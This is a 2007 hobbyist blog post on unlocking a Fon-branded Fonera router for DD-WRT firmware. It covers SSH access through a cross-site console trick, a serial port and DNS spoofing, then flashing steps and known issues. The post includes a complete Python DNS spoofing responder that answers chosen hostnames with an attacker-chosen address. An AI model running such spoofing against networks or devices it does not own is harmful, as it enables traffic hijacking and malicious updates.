Saturday, October 6, 2007

Fonera Fever

Intro
I have been working with some buddies and my long-time on-again/off-again friend Google.com to do unpleasant and inappropriate things to the Fonera router. Fon is a worldwide community of people who are willing to share their WiFi access with other members for free, and who have non-Fonners pay for time on the network. This is a great idea! Honestly, no more pirating WiFi... it is a global effort to make WiFi available to everyone. Well, it WAS a great idea. Fon was selling Linksys WRT54G routers, which natively run Linux and are treasured by many people as a fun wireless Linux toy, for a mere $5 plus shipping. Not bad, considering they still go for $60. People jumped on the deal, got Fon-branded WRT routers, then took them off the Fon network for their own gain. That's a really lousy thing to do: here is a company not asking for much, losing money trying to spread WiFi around... I'm not going to get into the morals or politics of that.

Fon learned their lesson the hard way. They tried another take on the free/cheap router deal. Now they have added some security and lockdowns so people can't steal Fon routers. This hasn't stopped people from doing it. To be honest, most of the people involved in the Fon hacking scene aren't trying to steal Fon routers; they want to unlock them and make them more useful, powerful, and configurable. I have a Fonera and a Linksys WRT router, and both are on the Fon network (the WRT is not Fon-branded; I just like the idea of the Fon community, so I added the Fon function to it).

Preface
Fon uses the DD-WRT router firmware, which was designed to replace the stock firmware on many routers, including the Linksys WRT series. It adds many useful functions and abilities that even the most expensive "gaming", VoIP, or QoS routers don't have. What's great about it is that you can add and remove features from the router as you need them, tailoring it to your individual needs. It's a great project and really fun to be a part of. Fon based their firmware on DD-WRT, which makes a really good foundation. They added and removed some stuff, as is to be expected. All in all the Fon firmware is OK, but it's a little lacking, and it's really, REALLY locked down. The only way to change a setting is to log into your Fon.com account, apply the settings there, and reboot the router so it pulls them down. I don't like that. What if you have no internet access? What if something went horribly wrong? There (in my opinion) isn't enough user control at the local router for it to be a viable router or AP. Plus the tiny lil' Fonera can do SO much more, so why the hell not?

Out of the box the Fonera has some limits on what it can do. Even after you install DD-WRT there are some minor issues that need to be worked out (see the list of what doesn't work below).

Secure Shell
To install DD-WRT you first need to gain SSH (Secure Shell) access to the system. There are three main ways of doing this as of this writing; your available hardware and the Fon firmware version on the box determine which method you use.

Method 1: Cross Site "Exploit"
DD-WRT has a web interface with a console page that lets you type in commands as if you were at a shell. Fon removed access to this. Using an HTML file you create and open in your own web browser, you can regain access to that console. Go here for information on how to make the files needed. Basically, take the HTML code provided and save it as Fon1.html and Fon2.html. The first page adds an iptables rule on the router that allows access to the SSH port (port 22). The second sends the command to start the Dropbear SSH server.

Method 2: Serial Access
The Fonera Wiki has information on how to hook up to the Fonera's serial port and get shell access. From there you can run the same console commands as in the previous method: add the iptables rule allowing access to the SSH port, then start the Dropbear SSH server manually.

Method 3: DNS Spoofing
Here are instructions with an easy way of enabling SSH using DNS spoofing. Remember when I mentioned that the Fonera calls home to pick up any settings that have changed? Well, Stefan of Datenbruch figured out a way to spoof the DNS server the Fonera uses and fool the hardware into enabling the SSH server; he nicknamed this Kolofonium. This is a very SLICK way of doing it and, to be honest, the ONLY way to get SSH enabled on the 0.7.1 r2 firmware that is being shipped out now.
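
To make the DNS spoofing idea concrete, here is a small spoofing resolver, written for this post as an added example (it is not Kolofonium and not code from Datenbruch or Fon). The hostname and the address it answers with are assumptions for the example; you would fill in whatever name the router actually looks up and the address of the box you want it to talk to instead. It parses a raw DNS query, answers A lookups for the names in its table with the spoofed address, and hands everything else to an upstream resolver so the router's other lookups still work.

```python
"""Minimal DNS spoofing responder (added example, not the original post's code)."""
import socket
import struct

# Assumed hostname the router resolves before fetching its configuration, and
# the address we want it to connect to instead. Both are assumptions for this
# example, not values taken from the original post.
SPOOF_TABLE = {
    "download.example-fon.test.": "192.168.10.1",
}


def encode_name(name):
    """Encode 'a.b.c' (with or without trailing dot) as DNS labels."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_name(data, offset):
    """Decode an uncompressed name at offset; return (lowercase FQDN, next offset)."""
    labels = []
    while True:
        length = data[offset]
        offset += 1
        if length == 0:
            break
        if length & 0xC0:
            raise ValueError("compressed name where a literal one was expected")
        labels.append(data[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels).lower() + ".", offset


def build_query(name, txid=0x1234):
    """Build a standard recursive A query (used to construct test input)."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", 1, 1)


def build_response(query, table, ttl=60):
    """Answer an A query for a spoofed name; return None if it is not ours."""
    if len(query) < 12:
        return None
    txid, flags, qdcount, _, _, _ = struct.unpack("!HHHHHH", query[:12])
    if flags & 0x8000 or qdcount != 1:
        return None  # a response, or a multi-question packet we do not handle
    qname, off = decode_name(query, 12)
    qtype, qclass = struct.unpack("!HH", query[off:off + 4])
    question = query[12:off + 4]
    if qtype != 1 or qclass != 1 or qname not in table:
        return None  # not an A/IN query for a spoofed name
    # Answer: pointer to the question name (0xC00C), TYPE A, CLASS IN, TTL, RDLENGTH 4.
    answer = struct.pack("!HHHIH", 0xC00C, 1, 1, ttl, 4) + socket.inet_aton(table[qname])
    # QR=1, AA=1, RA=1, RD copied from the query; same transaction ID.
    resp_flags = 0x8480 | (flags & 0x0100)
    header = struct.pack("!HHHHHH", txid, resp_flags, 1, 1, 0, 0)
    return header + question + answer


def parse_answer_ip(response):
    """Return the address in a single-answer A response (for checking our output)."""
    _, _, _, ancount, _, _ = struct.unpack("!HHHHHH", response[:12])
    if ancount != 1:
        return None
    _, off = decode_name(response, 12)
    off += 4  # skip QTYPE and QCLASS
    if response[off] & 0xC0 == 0xC0:
        off += 2  # compressed owner name
    else:
        _, off = decode_name(response, off)
    rtype, _, _, rdlen = struct.unpack("!HHIH", response[off:off + 10])
    off += 10
    if rtype != 1 or rdlen != 4:
        return None
    return socket.inet_ntoa(response[off:off + 4])


def serve(bind=("0.0.0.0", 53), table=SPOOF_TABLE, upstream=("9.9.9.9", 53)):
    """Serve spoofed answers; relay every other query to the upstream resolver."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind(bind)
    relay = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    relay.settimeout(2.0)
    while True:
        query, peer = sock.recvfrom(512)
        try:
            resp = build_response(query, table)
            if resp is None:
                relay.sendto(query, upstream)
                resp, _ = relay.recvfrom(512)
        except (ValueError, IndexError, struct.error, socket.timeout):
            continue
        sock.sendto(resp, peer)


if __name__ == "__main__":
    serve()
```

Point the router at this box as its DNS server (hand it out via DHCP on the WAN side, or put it in front of the router's upstream), and the router's next call home lands on the machine you control. Two practical notes: the upstream relay matters, because a router that can only resolve one name tends to stall on everything else; and this whole class of trick only gets you anywhere when the client does not authenticate what it fetches (plain HTTP, or TLS without checking the certificate), which is also why a device should never run unauthenticated code it pulled down from a hostname.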

Installing DD-WRT
Once you have SSH access you need to follow the simplified process for installing DD-WRT at Two Slashes. Nick (a buddy of mine from Techcentric) has put together a semi-clear how-to for getting DD-WRT going. The process is something like this:

1. Enable SSH (using one of the methods above).
2. Via SSH, make the flash ROM (the RedBoot FIS partition table) writable.
3. Copy the needed Fonera DD-WRT files to the router via SSH and 'wget'.
4. Write the new kernel, root filesystem image, etc., then reboot.
5. Log into the RedBoot bootloader, load the new bootloader configuration over TFTP, and install it.

That's the simplified process. It's a wee bit more complex than that, but that's the short story.

Hop on irc.bsodirc.org (linked with irc.techcentric.org) in #Fonners if you need any help.

Stuff that doesn't work
DHCP doesn't work on the LAN side for some reason.

GPIO has been disabled, so no SD card option... yet.

The JFFS2 filesystem is disabled, and it is needed for SD card support.

Anything that uses rfmon (monitor mode), like WiViz, Kismet, and Site Survey, doesn't work properly, or at all.

Dual antennas are a bad idea in this box. There isn't enough space (dual antennas should be spaced as far apart as possible!).

The heatsink is garbage. The thing constantly overheats.


Ending blabber
I'm working on a bunch of Fonera stuff, but I need my laptop, which should be here soon. I use my couchputer, but it's not designed for sitting there punching in SSH commands, so I get uncomfortable after 10 minutes. I'm focusing on hardware hacks, since that's my strong point. Adding a second antenna is easy as sin, but the lack of space in the Fonera makes it a not-so-good idea. You don't want Ant1 broadcasting directly into Ant2; that can damage the RF modules. You need to place the antennas at LEAST one wavelength apart, and for 2.4 GHz WiFi that's almost 5 inches. Honestly, as a radio guy, I would use at least 4 wavelengths to get better diversity. I want to focus on SD card support. Once you get an SD card in there, the number of packages you can install is damn near limitless. I want Site Survey, mainly Kismet, to work, but that can wait for now. Keep an eye on BSoD and TechCentric for some Fonera stuff, or if you don't want to wait for us to do segments, pop on IRC and join #Fonners.

Don't be a jerk and steal Fon routers.
